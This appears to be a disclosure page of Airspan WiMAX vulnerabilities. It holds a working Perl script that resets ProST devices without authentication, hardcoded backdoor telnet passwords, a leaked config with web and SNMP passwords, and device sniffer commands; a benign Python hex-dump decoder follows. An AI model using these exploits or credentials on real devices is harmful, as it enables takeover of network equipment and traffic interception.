Vulnerability reports

ProST web access authentication bypass (publication date 8.03.2008)

A remote, unauthenticated attacker may be able to gain access to a vulnerable device and make arbitrary changes to its configuration.

#!/usr/bin/perl -w

########################################
#                                      #
# US-CERT VU#248372, example           #
# by Arthur Lashin diriger@gmail.com   #
#                                      #
########################################

use strict;
use LWP::UserAgent;

unless (defined $ARGV[0]) {
    die "\nUsage: $0 prost_ip\n\n";
}

my $ip = $ARGV[0];

# Send the "reset to default" form to the device without any authentication.
prost_reset_to_default($ip);

sub prost_reset_to_default {
    my $ip        = shift;
    my $timeout   = 20;
    my $html_body = undef;

    my $ua = LWP::UserAgent->new;
    $ua->timeout($timeout);

    # Form fields of the /process_adv/ configuration page; the device accepts
    # them with no session or credentials.
    my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
    my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);

    if ($response->is_success) {
        $html_body = $response->content;
        print $html_body;
    } else {
        print "Connect to $ip failed: " . $response->status_line . "\n";
    }

    return $html_body;
}
Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z

Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)

The AirSpan BSDU has a serious security hole that allows anyone to obtain remote root access to the device through an undocumented telnet service, which is enabled by default. This is possible because all BSDUs share the same root password:

[root@diriger]# telnet 192.168.1.254
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
bsdu-wimax login: root
~ # uname -ar
Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown
~ #
~ # cd /root/shared/system
/root/shared/system # ls -lF
-rw-r--r-- 1 root root 4 Feb 26 08:17 activeBank
-rw-r--r-- 1 root root 256 Feb 26 08:15 bank1metadata
-rw-r--r-- 1 root root 27073 Feb 26 08:18 bank1verification
-rw-r--r-- 1 root root 256 Sep 5 2007 bank2metadata
-rw-r--r-- 1 root root 27073 Sep 6 2007 bank2verification
-rw-r--r-- 1 root root 223 Mar 11 14:51 cfgsh.conf
/root/shared/system #
/root/shared/system # cat ./cfgsh.conf
# WiMAX BSDU Configuration Shell config file
ifconf static
ip 192.168.1.254
nmask 255.255.255.0
gw 192.168.1.1
ns 10.0.0.1
sntps 10.0.0.2
httplp admin,k5Rw2SDcTi
snmproc w3E56G_0&
snmprwc kY^$ds_*
mvlan 15
Here “k5Rw2SDcTi” is the web access password. One can edit ./cfgsh.conf and reboot the device to apply new settings.
- ProST telnet access - asmax:airspanmax
Example:
VxWorks login: asmax
Password: airspanmax
-> memShow

status     bytes      blocks    avg block  max block
------     ---------  --------  ---------  ---------
current
  free     217876     56        3890       215928
  alloc    2611780    1807      1445       -
cumulative
  alloc    536676740  4823368   111        -
value = 0 = 0x0
-> plogStat
Plog status ( mask set 0x00000000,0x00000000 ) :
< 0> ERROR [Off]
< 1> WARN [Off]
< 2> INFO [Off]
< 3> CS [Off]
< 4> ARM0_APPL_TASK [Off]
< 5> CNFG [Off]
< 6> ExecLoop [Off]
< 7> MPA [Off]
< 8> MPDU [Off]
< 9> BRST [Off]
<10> Framing (maps) [Off]
<11> DCD & UCD [Off]
<12> Connection [Off]
<13> Network Entry [Off]
<14> Ranging [Off]
<15> SBC [Off]
<16> Link Maintenance [Off]
<17> Contention [Off]
<18> Link Manager [Off]
<19> LED ctrl [Off]
<20> Channel Reports [Off]
<21> IP Connectivity [Off]
<22> Registration [Off]
<23> Tx Scedular [Off]
<24> Management Msg [Off]
<25> MRCM [Off]
<26> PKM [Off]
<27> CRC & HCS Error [Off]
<28> RSSI & SNR [Off]
<29> BW Req & UL Alloc [Off]
<30> LED_PLUG [Off]
<31> DL Sync [Off]
<32> ARQ [Off]
<33> ARQ RX [Off]
<34> ARQ TX [Off]
<35> WIFI Keep Alive [Off]
<36> DFS [Off]
<37> FLASH [Off]
<38> RF Drivers [Off]
<39> WEB [Off]
<40> MIB [Off]
<41> Home BS [Off]
<42> Misc [Off]
value = 43 = 0x2b = '+'
-> plogOn 28
value = 0 = 0x0
462053292 A1[\mrcm.c,716]FCH 15792087: RSSI -155[dBm/10] (-660 at ant), SNR 312[dB/10], TimeOff 0[Smpl], FreqOff -674[Hz]
462053302 A1[\mrcm.c,716]FCH 15792088: RSSI -155[dBm/10] (-660 at ant), SNR 311[dB/10], TimeOff 0[Smpl], FreqOff -709[Hz]
462053312 A1[\mrcm.c,716]FCH 15792089: RSSI -155[dBm/10] (-660 at ant), SNR 322[dB/10], TimeOff 0[Smpl], FreqOff -715[Hz]
462053322 A1[\mrcm.c,716]FCH 15792090: RSSI -155[dBm/10] (-660 at ant), SNR 317[dB/10], TimeOff 0[Smpl], FreqOff -1067[Hz]
-> plogOff 28
value = 0 = 0x0
/* tcpdump like commands, parameter = packet number */
-> sniffFromAir 5
... skipped ...
-> sniffFromEth 10
... skipped ...
-> NVM_ef_Set2Default ### use this command to reset ProST to default ###
- MicroMAX BSR telnet access - Admin:airspansoc
Example:
VxWorks login: Admin
Password: airspansoc
-> cmd "Start"
value = 0 = 0x0
-> tShell task deleted
No entry for terminal type "dumb";
using dumb terminal settings.
bs>: help
... skipped ...
bs>: VLAN::showGlobalConfiguration
Global Vlan Bridge Information
==============================
Bridge Mode
Bridge Mode : Vlan Bridge
Reserved Vlans
Reserved Vlan (1) : 4090
Reserved Vlan (2) : 4091
Reserved Vlan (3) : 4092
Management Vlan
Management Vlan : 160
Q-in-Q Configuration
Q-in-Q mode : disabled
S-Tag Ether Type : 0x9100
S-Tag Pvid : 0
S-Tag Priority : 0
S-Tag config mode : by SS
S-Tag use priority from : C-Tag(inner)
bs>: showsniffer
SNIFFER
=======
state : disabled
no rules
bs>: createsnifferfilter direction=rx mac-filter=+112233445566 type=mac
bs>: createsnifferfilter direction=rx type=data
bs>: showsniffer
SNIFFER
=======
state : disabled
RULE id=14
rx sniffed : YES
tx sniffed : NO
data sniffed : YES
error type : ONLY VALID
mac sniffed : NO
bs>: enablesniffer
Packet sniffing enabled
INFO
point : RTM
date : 1528.350 s
PACKET DESCRIPTOR
Descriptor address : 0x0e808344
Actions : 0x00000000
DL pointer : 0x0ca2a420
Rx errors : 0x00000000
Encryption : no
KSN : 0
Packet type : 0x00000046
Raw : no
Wimax : yes
Ethernet : Basic Dix
VLAN : no
IP : IP v4
L4 : no
BWR / GSH value : 0
PHSi : No
CID : 0x00000202
Length : 60
Stuffing : 0
Burst/Stat number : 162
Mac message type : 0x00000000
802.16 infos : 0x00000010
Dest Address : 0x00000015622ef3f0
Dest Hash : 0x00001238
Src Address : 0x000000a00ac49b32
Src Hash : 0x00009c62
Ip header address : 0x0cfd45dc
Valid bit (not accurate) : Sw
DATA LINK
Link address : 0x0e808384
Next link : 0x00000000
Buffer @ : 0x0cfd45c0
Type : 128
Offset : 14
Payload len : 60
Buffer len : 1610
Payload address : 0x0cfd45c0
PAYLOAD
F3 F0 00 A0 0A C4 9B 32 81 00 00 10 08 00 45 00
00 20 00 F0 00 00 40 01 2C 6E C0 A8 81 D5 0A 01
01 01 00 00 D3 03 C4 07 13 56 7D AD D7 F0 00 00
00 00 00 00 00 00 00 00 00 00 00 00
INFO
point : RTM
date : 1531.130 s
PACKET DESCRIPTOR
Descriptor address : 0x0e8089b8
Actions : 0x00000000
DL pointer : 0x0ca2a420
Rx errors : 0x00000000
Encryption : no
KSN : 0
Packet type : 0x00000026
Raw : no
Wimax : yes
Ethernet : Basic Dix
VLAN : yes
IP : No
L4 : no
BWR / GSH value : 0
PHSi : No
CID : 0x00000204
Length : 64
Stuffing : 0
Burst/Stat number : 210
Mac message type : 0x00000000
802.16 infos : 0x00000010
Dest Address : 0x00000015622ef3f0
Dest Hash : 0x00001238
Src Address : 0x000000235e216f3a
Src Hash : 0x00009701
Ip header address : 0x00000000
Valid bit (not accurate) : Sw
DATA LINK
Link address : 0x0e8089f8
Next link : 0x00000000
Buffer @ : 0x0d001740
Type : 128
Offset : 14
Payload len : 64
Buffer len : 1610
Payload address : 0x0d001740
PAYLOAD
00 15 62 2E F3 F0 00 23 5E 21 6F 3A 81 00 00 1F
08 06 00 01 08 00 06 04 00 02 00 23 5E 21 6F 3A
0A 1E 03 86 00 15 62 2E F3 F0 0A 1E 03 85 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
disablesniffer
Packet sniffing disabled
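The two PAYLOAD hex dumps in the sniffer output above can be decoded offline to see what the BSR actually captured. The following Python script is an added example; it is not part of the original report and not an Airspan tool. It parses the Ethernet II header, the optional 802.1Q tag, and then either ARP or IPv4/ICMP, and it validates the IP and ICMP checksums. The first dump begins with F3 F0, the last two bytes of the descriptor's Dest Address, so the script assumes that dump starts four bytes into the Ethernet header and prepends the missing bytes taken from the descriptor; the realign function that does this is my assumption about the sniffer's output format, not documented device behaviour.

```python
import struct

# Hex dumps copied from the two PAYLOAD sections of the sniffer output above,
# plus the "Dest Address" value both packet descriptors report.
DUMP_1 = """
F3 F0 00 A0 0A C4 9B 32 81 00 00 10 08 00 45 00
00 20 00 F0 00 00 40 01 2C 6E C0 A8 81 D5 0A 01
01 01 00 00 D3 03 C4 07 13 56 7D AD D7 F0 00 00
00 00 00 00 00 00 00 00 00 00 00 00
"""
DUMP_2 = """
00 15 62 2E F3 F0 00 23 5E 21 6F 3A 81 00 00 1F
08 06 00 01 08 00 06 04 00 02 00 23 5E 21 6F 3A
0A 1E 03 86 00 15 62 2E F3 F0 0A 1E 03 85 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
"""
DESCRIPTOR_DEST = 0x00000015622EF3F0


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def ones_complement_sum(data):
    """RFC 1071 checksum; returns 0 when a checksummed region is intact."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def realign(raw, descriptor_dest):
    """Assumption: if the dump starts with a suffix of the descriptor's
    destination MAC, the leading bytes were dropped; prepend them."""
    dst = descriptor_dest.to_bytes(8, "big")[2:]  # low 6 bytes are the MAC
    for skipped in range(6):
        if raw[:6 - skipped] == dst[skipped:]:
            return dst[:skipped] + raw
    return raw


def decode_arp(p):
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", p[:8])
    return {"proto": "arp", "arp_op": {1: "request", 2: "reply"}.get(op, op),
            "sender_mac": mac_str(p[8:14]), "sender_ip": ip_str(p[14:18]),
            "target_mac": mac_str(p[18:24]), "target_ip": ip_str(p[24:28])}


def decode_ipv4(p):
    vihl, _tos, total_len, _id, _ff, ttl, proto, _csum = struct.unpack("!BBHHHBBH", p[:12])
    ihl = (vihl & 0x0F) * 4
    info = {"proto": "ipv4", "ttl": ttl, "ip_proto": proto,
            "src_ip": ip_str(p[12:16]), "dst_ip": ip_str(p[16:20]),
            "ip_header_ok": ones_complement_sum(p[:ihl]) == 0}
    body = p[ihl:total_len]  # drop Ethernet padding after the datagram
    if proto == 1 and len(body) >= 8:  # ICMP
        itype, code, _c, ident, seq = struct.unpack("!BBHHH", body[:8])
        info.update({"icmp_type": itype, "icmp_code": code, "icmp_id": ident,
                     "icmp_seq": seq, "icmp_ok": ones_complement_sum(body) == 0})
    return info


def decode_frame(raw):
    """Ethernet II header, optional 802.1Q tag, then ARP or IPv4."""
    if len(raw) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    info = {"dst_mac": mac_str(raw[0:6]), "src_mac": mac_str(raw[6:12]), "vlan": None}
    ethertype = struct.unpack("!H", raw[12:14])[0]
    off = 14
    if ethertype == 0x8100:
        tci, ethertype = struct.unpack("!HH", raw[14:18])
        info["vlan"] = tci & 0x0FFF
        off = 18
    info["ethertype"] = ethertype
    if ethertype == 0x0806:
        info.update(decode_arp(raw[off:]))
    elif ethertype == 0x0800:
        info.update(decode_ipv4(raw[off:]))
    else:
        info["proto"] = "other"
    return info


def decode_dump(text, descriptor_dest=DESCRIPTOR_DEST):
    # bytes.fromhex skips whitespace, so a dump can be pasted in unchanged.
    return decode_frame(realign(bytes.fromhex(text), descriptor_dest))


if __name__ == "__main__":
    for dump in (DUMP_1, DUMP_2):
        for key, value in decode_dump(dump).items():
            print(f"{key:14} {value}")
        print()
```

Record 1 decodes as an ICMP echo reply from 192.168.129.213 to 10.1.1.1 carried in VLAN 16 with valid IP and ICMP checksums (the descriptor lists "VLAN : no" for this record even though the bytes carry an 802.1Q tag), and record 2 as an ARP reply in VLAN 31 from 10.30.3.134 (00:23:5e:21:6f:3a) to 10.30.3.133 (00:15:62:2e:f3:f0).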
- MacroMAX BSR telnet access - root:asmaxroot